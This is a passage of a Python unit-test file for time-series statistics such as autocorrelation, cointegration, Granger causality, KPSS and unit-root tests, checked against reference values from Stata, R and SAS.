        cls.res1 = acf(cls.x, nlags=40, qstat=True, alpha=0.05, fft=False)
        cls.confint_res = cls.results[["acvar_lb", "acvar_ub"]].values
    def test_acf(self):
        # res1[0] holds the ACF values; lag 0 (always 1.0) is skipped.
        assert_almost_equal(self.res1[0][1:41], self.acf, DECIMAL_8)
    def test_confint(self):
        # Compare the centered confidence band against the Stata reference.
        centered = self.res1[1] - self.res1[1].mean(1)[:, None]
        assert_almost_equal(centered[1:41], self.confint_res, DECIMAL_8)
    def test_qstat(self):
        assert_almost_equal(self.res1[2][:40], self.qstat, DECIMAL_3)
        # 3 decimal places because of stata rounding
# FIXME: enable/xfail/skip or delete
# def pvalue(self):
# pass
# NOTE: should not need testing if Q stat is correct
class TestACF_FFT(CheckCorrGram):
    # Test Autocorrelation Function using FFT
    @classmethod
    def setup_class(cls):
        cls.acf = cls.results["acvarfft"]
        cls.qstat = cls.results["Q1"]
        cls.res1 = acf(cls.x, nlags=40, qstat=True, fft=True)
    def test_acf(self):
        # Lag 0 (always 1.0) is skipped.
        assert_almost_equal(self.res1[0][1:], self.acf, DECIMAL_8)
    def test_qstat(self):
        # todo why is res1/qstat 1 short
        assert_almost_equal(self.res1[1], self.qstat, DECIMAL_3)
class TestACFMissing(CheckCorrGram):
    # Test Autocorrelation Function using Missing
    @classmethod
    def setup_class(cls):
        # Prepend a NaN so every missing-data policy is exercised.
        cls.x = np.concatenate((np.array([np.nan]), cls.x))
        cls.acf = cls.results["acvar"]  # drop and conservative
        cls.qstat = cls.results["Q1"]
        cls.res_drop = acf(
            cls.x, nlags=40, qstat=True, alpha=0.05, missing="drop", fft=False
        )
        cls.res_conservative = acf(
            cls.x,
            nlags=40,
            qstat=True,
            alpha=0.05,
            fft=False,
            missing="conservative",
        )
        # With missing="none" the output is expected to be entirely NaN.
        cls.acf_none = np.empty(40) * np.nan  # lags 1 to 40 inclusive
        cls.qstat_none = np.empty(40) * np.nan
        cls.res_none = acf(
            cls.x, nlags=40, qstat=True, alpha=0.05, missing="none", fft=False
        )
    def test_raise(self):
        # missing="raise" must reject series containing NaNs.
        with pytest.raises(MissingDataError):
            acf(
                self.x,
                nlags=40,
                qstat=True,
                fft=False,
                alpha=0.05,
                missing="raise",
            )
    def test_acf_none(self):
        assert_almost_equal(self.res_none[0][1:41], self.acf_none, DECIMAL_8)
    def test_acf_drop(self):
        assert_almost_equal(self.res_drop[0][1:41], self.acf, DECIMAL_8)
    def test_acf_conservative(self):
        assert_almost_equal(
            self.res_conservative[0][1:41], self.acf, DECIMAL_8
        )
    def test_qstat_none(self):
        # todo why is res1/qstat 1 short
        assert_almost_equal(self.res_none[2], self.qstat_none, DECIMAL_3)
# FIXME: enable/xfail/skip or delete
# how to do this test? the correct q_stat depends on whether nobs=len(x) is
# used when x contains NaNs or whether nobs<len(x) when x contains NaNs
# def test_qstat_drop(self):
# assert_almost_equal(self.res_drop[2][:40], self.qstat, DECIMAL_3)
class TestPACF(CheckCorrGram):
    # Partial autocorrelation tests: OLS and Yule-Walker estimates
    # against Stata reference values, plus internal consistency of the
    # Levinson-Durbin variants.

    @classmethod
    def setup_class(cls):
        cls.pacfols = cls.results["PACOLS"]
        cls.pacfyw = cls.results["PACYW"]

    def test_ols(self):
        pacfols, confint = pacf(self.x, nlags=40, alpha=0.05, method="ols")
        assert_almost_equal(pacfols[1:], self.pacfols, DECIMAL_6)
        centered = confint - confint.mean(1)[:, None]
        # from edited Stata ado file
        res = [[-0.1375625, 0.1375625]] * 40
        assert_almost_equal(centered[1:41], res, DECIMAL_6)
        # check lag 0: PACF is exactly 1 with a degenerate interval
        assert_equal(centered[0], [0.0, 0.0])
        assert_equal(confint[0], [1, 1])
        assert_equal(pacfols[0], 1)

    def test_ols_inefficient(self):
        # Compare the "inefficient" OLS PACF with a direct per-lag
        # least-squares computation on the demeaned series.
        lag_len = 5
        pacfols = pacf_ols(self.x, nlags=lag_len, efficient=False)
        x = self.x.copy()
        x -= x.mean()
        n = x.shape[0]
        lags = np.zeros((n - 5, 5))
        lead = x[5:]
        direct = np.empty(lag_len + 1)
        direct[0] = 1.0
        for i in range(lag_len):
            lags[:, i] = x[5 - (i + 1) : -(i + 1)]
            direct[i + 1] = lstsq(lags[:, : (i + 1)], lead, rcond=None)[0][-1]
        assert_allclose(pacfols, direct, atol=1e-8)

    def test_yw(self):
        pacfyw = pacf_yw(self.x, nlags=40, method="mle")
        assert_almost_equal(pacfyw[1:], self.pacfyw, DECIMAL_8)

    def test_ld(self):
        # Levinson-Durbin variants must agree with the corresponding
        # Yule-Walker estimates (biased "ldb" vs "mle", "lda" vs "yw").
        pacfyw = pacf_yw(self.x, nlags=40, method="mle")
        pacfld = pacf(self.x, nlags=40, method="ldb")
        assert_almost_equal(pacfyw, pacfld, DECIMAL_8)
        pacfyw = pacf(self.x, nlags=40, method="yw")
        pacfld = pacf(self.x, nlags=40, method="lda")
        assert_almost_equal(pacfyw, pacfld, DECIMAL_8)
class TestBreakvarHeteroskedasticityTest(object):
    # Tests for breakvar_heteroskedasticity_test: the statistic is the
    # ratio of the sum of squared residuals in the final subset to that
    # of the initial subset; expected values are computed by hand below.

    from scipy.stats import chi2, f

    def test_1d_input(self):
        input_residuals = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
        # Default subset is one third of the sample (2 of 6 residuals).
        expected_statistic = (4.0 ** 2 + 5.0 ** 2) / (0.0 ** 2 + 1.0 ** 2)
        # ~ F(2, 2), two-sided test
        expected_pvalue = 2 * min(
            self.f.cdf(expected_statistic, 2, 2),
            self.f.sf(expected_statistic, 2, 2),
        )
        actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
            input_residuals
        )
        assert actual_statistic == expected_statistic
        assert actual_pvalue == expected_pvalue

    def test_2d_input_with_missing_values(self):
        # Each column is tested independently; NaNs shrink the effective
        # subset (column 1) or make the result NaN entirely (column 2).
        input_residuals = np.array(
            [
                [0.0, 0.0, np.nan],
                [1.0, np.nan, 1.0],
                [2.0, 2.0, np.nan],
                [3.0, 3.0, 3.0],
                [4.0, 4.0, 4.0],
                [5.0, 5.0, 5.0],
                [6.0, 6.0, 6.0],
                [7.0, 7.0, 7.0],
                [8.0, 8.0, 8.0],
            ]
        )
        expected_statistic = np.array(
            [
                (8.0 ** 2 + 7.0 ** 2 + 6.0 ** 2)
                / (0.0 ** 2 + 1.0 ** 2 + 2.0 ** 2),
                (8.0 ** 2 + 7.0 ** 2 + 6.0 ** 2) / (0.0 ** 2 + 2.0 ** 2),
                np.nan,
            ]
        )
        expected_pvalue = np.array(
            [
                2
                * min(
                    self.f.cdf(expected_statistic[0], 3, 3),
                    self.f.sf(expected_statistic[0], 3, 3),
                ),
                2
                * min(
                    self.f.cdf(expected_statistic[1], 3, 2),
                    self.f.sf(expected_statistic[1], 3, 2),
                ),
                np.nan,
            ]
        )
        actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
            input_residuals
        )
        assert_equal(actual_statistic, expected_statistic)
        assert_equal(actual_pvalue, expected_pvalue)

    # subset_length may be an absolute count (2) or a fraction (0.5).
    @pytest.mark.parametrize(
        "subset_length,expected_statistic,expected_pvalue",
        [
            (2, 41, 2 * min(f.cdf(41, 2, 2), f.sf(41, 2, 2))),
            (0.5, 10, 2 * min(f.cdf(10, 3, 3), f.sf(10, 3, 3))),
        ],
    )
    def test_subset_length(
        self, subset_length, expected_statistic, expected_pvalue
    ):
        input_residuals = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
        actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
            input_residuals,
            subset_length=subset_length,
        )
        assert actual_statistic == expected_statistic
        assert actual_pvalue == expected_pvalue

    # "decreasing" inverts the statistic; one-sided alternatives use the
    # survival function directly.
    @pytest.mark.parametrize(
        "alternative,expected_statistic,expected_pvalue",
        [
            ("two-sided", 41, 2 * min(f.cdf(41, 2, 2), f.sf(41, 2, 2))),
            ("decreasing", 1 / 41, f.sf(1 / 41, 2, 2)),
            ("increasing", 41, f.sf(41, 2, 2)),
        ],
    )
    def test_alternative(
        self, alternative, expected_statistic, expected_pvalue
    ):
        input_residuals = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
        actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
            input_residuals,
            alternative=alternative,
        )
        assert actual_statistic == expected_statistic
        assert actual_pvalue == expected_pvalue

    def test_use_chi2(self):
        # use_f=False switches to the chi-squared approximation, which
        # scales the statistic by the subset length (2 here).
        input_residuals = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
        expected_statistic = (4.0 ** 2 + 5.0 ** 2) / (0.0 ** 2 + 1.0 ** 2)
        expected_pvalue = 2 * min(
            self.chi2.cdf(2 * expected_statistic, 2),
            self.chi2.sf(2 * expected_statistic, 2),
        )
        actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
            input_residuals,
            use_f=False,
        )
        assert actual_statistic == expected_statistic
        assert actual_pvalue == expected_pvalue
class CheckCoint(object):
    """
    Test Cointegration Test Results for 2-variable system

    Test values taken from Stata
    """

    levels = ["1%", "5%", "10%"]
    # Shared fixture: real consumption vs real GDP from the macrodata set.
    data = macrodata.load_pandas()
    y1 = data.data["realcons"].values
    y2 = data.data["realgdp"].values

    def test_tstat(self):
        # Subclasses set coint_t (computed) and teststat (reference).
        assert_almost_equal(self.coint_t, self.teststat, DECIMAL_4)
# this does not produce the old results anymore
class TestCoint_t(CheckCoint):
    """
    Get AR(1) parameter on residuals

    Cointegration t-statistic with a constant trend and no lagged
    differences (maxlag=0, autolag=None), compared against a stored
    regression value.
    """

    @classmethod
    def setup_class(cls):
        # cls.coint_t = coint(cls.y1, cls.y2, trend="c")[0]
        cls.coint_t = coint(cls.y1, cls.y2, trend="c", maxlag=0, autolag=None)[
            0
        ]
        # The historical Stata value -1.8208817 is no longer reproduced
        # (see note above); keep only the current regression value. The
        # old code assigned both, so the first assignment was dead.
        cls.teststat = -1.830170986148
def test_coint():
    # Compare coint() Engle-Granger statistics and critical values
    # against Stata's egranger command for 2- to 4-variable systems,
    # for each deterministic trend specification.
    nobs = 200
    scale_e = 1
    const = [1, 0, 0.5, 0]
    np.random.seed(123)
    unit = np.random.randn(nobs).cumsum()
    y = scale_e * np.random.randn(nobs, 4)
    # First two columns share a common stochastic trend (cointegrated).
    y[:, :2] += unit[:, None]
    y += const
    # Rounded so the data can be reproduced exactly in Stata.
    y = np.round(y, 4)

    # FIXME: enable/xfail/skip or delete
    for trend in []:  # ['c', 'ct', 'ctt', 'n']:
        print("\n", trend)
        print(coint(y[:, 0], y[:, 1], trend=trend, maxlag=4, autolag=None))
        print(coint(y[:, 0], y[:, 1:3], trend=trend, maxlag=4, autolag=None))
        print(coint(y[:, 0], y[:, 2:], trend=trend, maxlag=4, autolag=None))
        print(coint(y[:, 0], y[:, 1:], trend=trend, maxlag=4, autolag=None))

    # results from Stata egranger
    # res[i] = [teststat, 1% crit, 5% crit, 10% crit] for system i.
    res_egranger = {}
    # trend = 'ct'
    res = res_egranger["ct"] = {}
    res[0] = [
        -5.615251442239,
        -4.406102369132,
        -3.82866685109,
        -3.532082997903,
    ]
    res[1] = [
        -5.63591313706,
        -4.758609717199,
        -4.179130554708,
        -3.880909696863,
    ]
    res[2] = [
        -2.892029275027,
        -4.758609717199,
        -4.179130554708,
        -3.880909696863,
    ]
    res[3] = [-5.626932544079, -5.08363327039, -4.502469783057, -4.2031051091]

    # trend = 'c'
    res = res_egranger["c"] = {}
    # first critical value res[0][1] has a discrepancy starting at 4th decimal
    res[0] = [
        -5.760696844656,
        -3.952043522638,
        -3.367006313729,
        -3.065831247948,
    ]
    # manually adjusted to have higher precision as in other cases
    res[0][1] = -3.952321293401682
    res[1] = [
        -5.781087068772,
        -4.367111915942,
        -3.783961136005,
        -3.483501524709,
    ]
    res[2] = [
        -2.477444137366,
        -4.367111915942,
        -3.783961136005,
        -3.483501524709,
    ]
    res[3] = [
        -5.778205811661,
        -4.735249216434,
        -4.152738973763,
        -3.852480848968,
    ]

    # trend = 'ctt'
    res = res_egranger["ctt"] = {}
    res[0] = [
        -5.644431269946,
        -4.796038299708,
        -4.221469431008,
        -3.926472577178,
    ]
    res[1] = [-5.665691609506, -5.111158174219, -4.53317278104, -4.23601008516]
    res[2] = [-3.161462374828, -5.111158174219, -4.53317278104, -4.23601008516]
    res[3] = [
        -5.657904558563,
        -5.406880189412,
        -4.826111619543,
        -4.527090164875,
    ]

    # The following for 'n' are only regression test numbers
    # trend = 'n' not allowed in egranger
    # trend = 'n'
    res = res_egranger["n"] = {}
    nan = np.nan  # shortcut for table
    res[0] = [-3.7146175989071137, nan, nan, nan]
    res[1] = [-3.8199323012888384, nan, nan, nan]
    res[2] = [-1.6865000791270679, nan, nan, nan]
    res[3] = [-3.7991270451873675, nan, nan, nan]

    with pytest.warns(FutureWarning):
        # Ensure warning raised for nc rather than n
        coint(y[:, 0], y[:, 1], trend="nc", maxlag=4, autolag=None)

    for trend in ["c", "ct", "ctt", "n"]:
        res1 = {}
        res1[0] = coint(y[:, 0], y[:, 1], trend=trend, maxlag=4, autolag=None)
        res1[1] = coint(
            y[:, 0], y[:, 1:3], trend=trend, maxlag=4, autolag=None
        )
        res1[2] = coint(y[:, 0], y[:, 2:], trend=trend, maxlag=4, autolag=None)
        res1[3] = coint(y[:, 0], y[:, 1:], trend=trend, maxlag=4, autolag=None)
        for i in range(4):
            res = res_egranger[trend]
            # Test statistic with tight relative tolerance ...
            assert_allclose(res1[i][0], res[i][0], rtol=1e-11)
            # ... and critical values with a loose absolute tolerance.
            r2 = res[i][1:]
            r1 = res1[i][2]
            assert_allclose(r1, r2, rtol=0, atol=6e-7)

    # use default autolag #4490
    res1_0 = coint(y[:, 0], y[:, 1], trend="ct", maxlag=4)
    assert_allclose(res1_0[2], res_egranger["ct"][0][1:], rtol=0, atol=6e-7)
    # the following is just a regression test
    assert_allclose(
        res1_0[:2],
        [-13.992946638547112, 2.270898990540678e-27],
        rtol=1e-10,
        atol=1e-27,
    )
def test_coint_identical_series():
    # Cointegrating a series with itself is perfectly collinear: the
    # test must warn and return a -inf statistic with p-value 0.
    nobs = 200
    scale_e = 1
    np.random.seed(123)
    y = scale_e * np.random.randn(nobs)
    warnings.simplefilter("always", CollinearityWarning)
    with pytest.warns(CollinearityWarning):
        c = coint(y, y, trend="c", maxlag=0, autolag=None)
    assert_equal(c[1], 0.0)
    assert_(np.isneginf(c[0]))
def test_coint_perfect_collinearity():
    # test uses nearly perfect collinearity
    # y is (almost) an exact linear combination of the x columns, which
    # should drive the Engle-Granger statistic to -inf with p-value 0.
    nobs = 200
    scale_e = 1
    np.random.seed(123)
    x = scale_e * np.random.randn(nobs, 2)
    y = 1 + x.sum(axis=1) + 1e-7 * np.random.randn(nobs)
    warnings.simplefilter("always", CollinearityWarning)
    # Record (and thereby silence) the expected CollinearityWarning; the
    # warning itself is asserted in test_coint_identical_series, so the
    # previously captured-but-unused warning list binding was removed.
    with warnings.catch_warnings(record=True):
        c = coint(y, x, trend="c", maxlag=0, autolag=None)
    assert_equal(c[1], 0.0)
    assert_(np.isneginf(c[0]))
class TestGrangerCausality(object):
    # Tests for grangercausalitytests on log-differenced GDP/consumption.

    def test_grangercausality(self):
        # some example data
        mdata = macrodata.load_pandas().data
        mdata = mdata[["realgdp", "realcons"]].values
        data = mdata.astype(float)
        data = np.diff(np.log(data), axis=0)

        # R: lmtest:grangertest
        r_result = [0.243097, 0.7844328, 195, 2]  # f_test
        # data[:, 1::-1] reverses the columns: consumption -> GDP.
        gr = grangercausalitytests(data[:, 1::-1], 2, verbose=False)
        assert_almost_equal(r_result, gr[2][0]["ssr_ftest"], decimal=7)
        assert_almost_equal(
            gr[2][0]["params_ftest"], gr[2][0]["ssr_ftest"], decimal=7
        )

    def test_grangercausality_single(self):
        # Passing maxlag=[2] should run only lag 2 and match maxlag=2.
        mdata = macrodata.load_pandas().data
        mdata = mdata[["realgdp", "realcons"]].values
        data = mdata.astype(float)
        data = np.diff(np.log(data), axis=0)
        gr = grangercausalitytests(data[:, 1::-1], 2, verbose=False)
        gr2 = grangercausalitytests(data[:, 1::-1], [2], verbose=False)
        assert 1 in gr
        assert 1 not in gr2
        assert_almost_equal(
            gr[2][0]["ssr_ftest"], gr2[2][0]["ssr_ftest"], decimal=7
        )
        assert_almost_equal(
            gr[2][0]["params_ftest"], gr2[2][0]["ssr_ftest"], decimal=7
        )

    def test_granger_fails_on_nobs_check(self, reset_randomstate):
        # Test that if maxlag is too large, Granger Test raises a clear error.
        x = np.random.rand(10, 2)
        grangercausalitytests(x, 2, verbose=False)  # This should pass.
        with pytest.raises(ValueError):
            grangercausalitytests(x, 3, verbose=False)

    def test_granger_fails_on_finite_check(self, reset_randomstate):
        # NaN/inf in the input must be rejected.
        x = np.random.rand(1000, 2)
        x[500, 0] = np.nan
        x[750, 1] = np.inf
        with pytest.raises(ValueError, match="x contains NaN"):
            grangercausalitytests(x, 2)

    def test_granger_fails_on_zero_lag(self, reset_randomstate):
        # Lag 0 is meaningless for Granger causality and must be rejected.
        x = np.random.rand(1000, 2)
        with pytest.raises(
            ValueError,
            match="maxlag must be a non-empty list containing only positive integers",
        ):
            grangercausalitytests(x, [0, 1, 2])
class TestKPSS:
    """
    R-code
    ------
    library(tseries)
    kpss.stat(x, "Level")
    kpss.stat(x, "Trend")

    In this context, x is the vector containing the
    macrodata['realgdp'] series.
    """

    @classmethod
    def setup(cls):
        cls.data = macrodata.load_pandas()
        cls.x = cls.data.data["realgdp"].values

    def test_fail_nonvector_input(self, reset_randomstate):
        # should be fine
        with pytest.warns(InterpolationWarning):
            kpss(self.x, nlags="legacy")

        # 2-d input must be rejected.
        x = np.random.rand(20, 2)
        assert_raises(ValueError, kpss, x)

    def test_fail_unclear_hypothesis(self):
        # these should be fine: regression is case-insensitive
        with pytest.warns(InterpolationWarning):
            kpss(self.x, "c", nlags="legacy")
        with pytest.warns(InterpolationWarning):
            kpss(self.x, "C", nlags="legacy")
        with pytest.warns(InterpolationWarning):
            kpss(self.x, "ct", nlags="legacy")
        with pytest.warns(InterpolationWarning):
            kpss(self.x, "CT", nlags="legacy")

        assert_raises(
            ValueError, kpss, self.x, "unclear hypothesis", nlags="legacy"
        )

    def test_teststat(self):
        # Reference values from R tseries::kpss.stat (see class docstring).
        with pytest.warns(InterpolationWarning):
            kpss_stat, _, _, _ = kpss(self.x, "c", 3)
        assert_almost_equal(kpss_stat, 5.0169, DECIMAL_3)

        with pytest.warns(InterpolationWarning):
            kpss_stat, _, _, _ = kpss(self.x, "ct", 3)
        assert_almost_equal(kpss_stat, 1.1828, DECIMAL_3)

    def test_pval(self):
        # Statistic is off the table, so the p-value is clamped to 0.01
        # (hence the InterpolationWarning).
        with pytest.warns(InterpolationWarning):
            _, pval, _, _ = kpss(self.x, "c", 3)
        assert_equal(pval, 0.01)

        with pytest.warns(InterpolationWarning):
            _, pval, _, _ = kpss(self.x, "ct", 3)
        assert_equal(pval, 0.01)

    def test_store(self):
        with pytest.warns(InterpolationWarning):
            _, _, _, store = kpss(self.x, "c", 3, True)

        # assert attributes, and make sure they're correct
        assert_equal(store.nobs, len(self.x))
        assert_equal(store.lags, 3)

    # test autolag function _kpss_autolag against SAS 9.3
    def test_lags(self):
        # real GDP from macrodata data set
        with pytest.warns(InterpolationWarning):
            res = kpss(self.x, "c", nlags="auto")
        assert_equal(res[2], 9)
        # real interest rates from macrodata data set
        res = kpss(sunspots.load().data["SUNACTIVITY"], "c", nlags="auto")
        assert_equal(res[2], 7)
        # volumes from nile data set
        with pytest.warns(InterpolationWarning):
            res = kpss(nile.load().data["volume"], "c", nlags="auto")
        assert_equal(res[2], 5)
        # log-coinsurance from randhie data set
        with pytest.warns(InterpolationWarning):
            res = kpss(randhie.load().data["lncoins"], "ct", nlags="auto")
        assert_equal(res[2], 75)
        # in-vehicle time from modechoice data set
        with pytest.warns(InterpolationWarning):
            res = kpss(modechoice.load().data["invt"], "ct", nlags="auto")
        assert_equal(res[2], 18)

    def test_kpss_fails_on_nobs_check(self):
        # Test that if lags exceeds number of observations KPSS raises a
        # clear error
        # GH5925
        nobs = len(self.x)
        msg = r"lags \({}\) must be < number of observations \({}\)".format(
            nobs, nobs
        )
        with pytest.raises(ValueError, match=msg):
            kpss(self.x, "c", nlags=nobs)

    def test_kpss_autolags_does_not_assign_lags_equal_to_nobs(self):
        # Test that if *autolags* exceeds number of observations, we set
        # suitable lags
        # GH5925
        base = np.array([0, 0, 0, 0, 0, 1, 1.0])
        data_which_breaks_autolag = np.r_[np.tile(base, 297 // 7), [0, 0, 0]]
        kpss(data_which_breaks_autolag, nlags="auto")

    def test_legacy_lags(self):
        # Test legacy lags are the same
        with pytest.warns(InterpolationWarning):
            res = kpss(self.x, "c", nlags="legacy")
        assert_equal(res[2], 15)

    def test_unknown_lags(self):
        # Unrecognized nlags strings must be rejected.
        with pytest.raises(ValueError):
            kpss(self.x, "c", nlags="unknown")

    def test_none(self):
        # nlags=None is deprecated and should emit a FutureWarning.
        with pytest.warns(FutureWarning):
            kpss(self.x, nlags=None)
class TestRUR:
    """
    Simple implementation
    ------
    Since an R implementation of the test cannot be found, the method is tested
    against a simple implementation using a for loop.

    In this context, x is the vector containing the
    macrodata['realgdp'] series.
    """

    @classmethod
    def setup(cls):
        cls.data = macrodata.load_pandas()
        cls.x = cls.data.data["realgdp"].values

    # To be removed when range unit test gets an R implementation
    def simple_rur(self, x, store=False):
        # Reference implementation of the range unit-root test: counts
        # new running maxima/minima and normalizes by sqrt(n), then
        # interpolates p-value/critical values from a simulated table.
        x = array_like(x, "x")
        store = bool_like(store, "store")

        nobs = x.shape[0]
        # if m is not one, n != m * n
        if nobs != x.size:
            raise ValueError("x of shape {0} not understood".format(x.shape))

        # Table from [1] has been replicated using 200,000 samples
        # Critical values for new n_obs values have been identified
        pvals = [0.01, 0.025, 0.05, 0.10, 0.90, 0.95]
        n = np.array(
            [25, 50, 100, 150, 200, 250, 500, 1000, 2000, 3000, 4000, 5000]
        )
        crit = np.array(
            [
                [0.6626, 0.8126, 0.9192, 1.0712, 2.4863, 2.7312],
                [0.7977, 0.9274, 1.0478, 1.1964, 2.6821, 2.9613],
                [0.907, 1.0243, 1.1412, 1.2888, 2.8317, 3.1393],
                [0.9543, 1.0768, 1.1869, 1.3294, 2.8915, 3.2049],
                [0.9833, 1.0984, 1.2101, 1.3494, 2.9308, 3.2482],
                [0.9982, 1.1137, 1.2242, 1.3632, 2.9571, 3.2482],
                [1.0494, 1.1643, 1.2712, 1.4076, 3.0207, 3.3584],
                [1.0846, 1.1959, 1.2988, 1.4344, 3.0653, 3.4073],
                [1.1121, 1.2200, 1.3230, 1.4556, 3.0948, 3.4439],
                [1.1204, 1.2295, 1.3318, 1.4656, 3.1054, 3.4632],
                [1.1309, 1.2347, 1.3318, 1.4693, 3.1165, 3.4717],
                [1.1377, 1.2402, 1.3408, 1.4729, 3.1252, 3.4807],
            ]
        )

        # Interpolation for nobs
        inter_crit = np.zeros((1, crit.shape[1]))
        for i in range(crit.shape[1]):
            f = interp1d(n, crit[:, i])
            inter_crit[0, i] = f(nobs)

        # Calculate RUR stat: count strictly new running extrema.
        count = 0
        max_p = x[0]
        min_p = x[0]
        for v in x[1:]:
            if v > max_p:
                max_p = v
                count = count + 1
            if v < min_p:
                min_p = v
                count = count + 1

        rur_stat = count / np.sqrt(len(x))

        # Find the smallest tabulated p-value bracket for the statistic.
        k = len(pvals) - 1
        for i in range(len(pvals) - 1, -1, -1):
            if rur_stat < inter_crit[0, i]:
                k = i
            else:
                break

        p_value = pvals[k]

        warn_msg = """\
The test statistic is outside of the range of p-values available in the
look-up table. The actual p-value is {direction} than the p-value returned.
"""
        direction = ""
        if p_value == pvals[-1]:
            direction = "smaller"
        elif p_value == pvals[0]:
            direction = "larger"

        if direction:
            warnings.warn(
                warn_msg.format(direction=direction), InterpolationWarning
            )

        crit_dict = {
            "10%": inter_crit[0, 3],
            "5%": inter_crit[0, 2],
            "2.5%": inter_crit[0, 1],
            "1%": inter_crit[0, 0],
        }

        if store:
            from statsmodels.stats.diagnostic import ResultsStore

            rstore = ResultsStore()
            rstore.nobs = nobs
            rstore.H0 = "The series is not stationary"
            rstore.HA = "The series is stationary"
            return rur_stat, p_value, crit_dict, rstore
        else:
            return rur_stat, p_value, crit_dict

    def test_fail_nonvector_input(self, reset_randomstate):
        with pytest.warns(InterpolationWarning):
            range_unit_root_test(self.x)

        # 2-d input must be rejected.
        x = np.random.rand(20, 2)
        assert_raises(ValueError, range_unit_root_test, x)

    def test_teststat(self):
        with pytest.warns(InterpolationWarning):
            rur_stat, _, _ = range_unit_root_test(self.x)
        simple_rur_stat, _, _ = self.simple_rur(self.x)
        assert_almost_equal(rur_stat, simple_rur_stat, DECIMAL_3)

    def test_pval(self):
        with pytest.warns(InterpolationWarning):
            _, pval, _ = range_unit_root_test(self.x)
        _, simple_pval, _ = self.simple_rur(self.x)
        assert_equal(pval, simple_pval)

    def test_store(self):
        with pytest.warns(InterpolationWarning):
            _, _, _, store = range_unit_root_test(self.x, True)

        # assert attributes, and make sure they're correct
        assert_equal(store.nobs, len(self.x))
def test_pandasacovf():
    """acovf gives identical results for a Series and its ndarray values."""
    series = Series(lrange(1, 11))
    expected = acovf(series.values, fft=False)
    assert_almost_equal(acovf(series, fft=False), expected)
def test_acovf2d(reset_randomstate):
    # A single-column DataFrame is accepted and matches its ndarray,
    # but a plain 2-d array is rejected.
    dta = sunspots.load_pandas().data
    dta.index = date_range(start="1700", end="2009", freq="A")[:309]
    del dta["YEAR"]
    res = acovf(dta, fft=False)
    assert_equal(res, acovf(dta.values, fft=False))

    x = np.random.random((10, 2))
    with pytest.raises(ValueError):
        acovf(x, fft=False)
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
def test_acovf_fft_vs_convolution(demean, adjusted, reset_randomstate):
    """The FFT and convolution acovf implementations must agree."""
    data = np.random.normal(size=100)
    via_fft = acovf(data, demean=demean, adjusted=adjusted, fft=True)
    via_convolution = acovf(data, demean=demean, adjusted=adjusted, fft=False)
    assert_almost_equal(via_fft, via_convolution, decimal=7)
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
def test_ccovf_fft_vs_convolution(demean, adjusted, reset_randomstate):
    """The FFT and convolution ccovf implementations must agree."""
    first = np.random.normal(size=128)
    second = np.random.normal(size=128)
    via_convolution = ccovf(
        first, second, demean=demean, adjusted=adjusted, fft=False
    )
    via_fft = ccovf(first, second, demean=demean, adjusted=adjusted, fft=True)
    assert_almost_equal(via_convolution, via_fft, decimal=7)
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
@pytest.mark.parametrize("fft", [True, False])
def test_compare_acovf_vs_ccovf(demean, adjusted, fft, reset_randomstate):
    """acovf(x) must equal ccovf(x, x) for every option combination."""
    data = np.random.normal(size=128)
    auto_cov = acovf(data, demean=demean, adjusted=adjusted, fft=fft)
    cross_cov = ccovf(data, data, demean=demean, adjusted=adjusted, fft=fft)
    assert_almost_equal(auto_cov, cross_cov, decimal=7)
@pytest.mark.smoke
@pytest.mark.slow
def test_arma_order_select_ic():
    # smoke test, assumes info-criteria are right
    from statsmodels.tsa.arima_process import arma_generate_sample

    arparams = np.array([0.75, -0.25])
    maparams = np.array([0.65, 0.35])
    arparams = np.r_[1, -arparams]
    maparam = np.r_[1, maparams]  # FIXME: Never used
    nobs = 250
    np.random.seed(2014)
    y = arma_generate_sample(arparams, maparams, nobs)

    res = arma_order_select_ic(y, ic=["aic", "bic"], trend="n")
    # regression tests in case we change algorithm to minic in sas
    # Rows index the AR order (0-4), columns the MA order (0-2).
    aic_x = np.array(
        [
            [764.36517643, 552.7342255, 484.29687843],
            [562.10924262, 485.5197969, 480.32858497],
            [507.04581344, 482.91065829, 481.91926034],
            [484.03995962, 482.14868032, 483.86378955],
            [481.8849479, 483.8377379, 485.83756612],
        ]
    )
    bic_x = np.array(
        [
            [767.88663735, 559.77714733, 494.86126118],
            [569.15216446, 496.08417966, 494.41442864],
            [517.61019619, 496.99650196, 499.52656493],
            [498.12580329, 499.75598491, 504.99255506],
            [499.49225249, 504.96650341, 510.48779255],
        ]
    )
    aic = DataFrame(aic_x, index=lrange(5), columns=lrange(3))
    bic = DataFrame(bic_x, index=lrange(5), columns=lrange(3))
    assert_almost_equal(res.aic.values, aic.values, 5)
    assert_almost_equal(res.bic.values, bic.values, 5)
    assert_equal(res.aic_min_order, (1, 2))
    assert_equal(res.bic_min_order, (1, 2))
    assert_(res.aic.index.equals(aic.index))
    assert_(res.aic.columns.equals(aic.columns))
    assert_(res.bic.index.equals(bic.index))
    assert_(res.bic.columns.equals(bic.columns))

    # Same data as a pandas Series with a restricted search grid.
    index = pd.date_range("2000-1-1", freq="M", periods=len(y))
    y_series = pd.Series(y, index=index)
    res_pd = arma_order_select_ic(
        y_series, max_ar=2, max_ma=1, ic=["aic", "bic"], trend="n"
    )
    assert_almost_equal(res_pd.aic.values, aic.values[:3, :2], 5)
    assert_almost_equal(res_pd.bic.values, bic.values[:3, :2], 5)
    assert_equal(res_pd.aic_min_order, (2, 1))
    assert_equal(res_pd.bic_min_order, (1, 1))

    # Single information criterion passed as a string.
    res = arma_order_select_ic(y, ic="aic", trend="n")
    assert_almost_equal(res.aic.values, aic.values, 5)
    assert_(res.aic.index.equals(aic.index))
    assert_(res.aic.columns.equals(aic.columns))
    assert_equal(res.aic_min_order, (1, 2))
def test_arma_order_select_ic_failure():
    # this should trigger an SVD convergence failure, smoke test that it
    # returns, likely platform dependent failure...
    # looks like AR roots may be cancelling out for 4, 1?
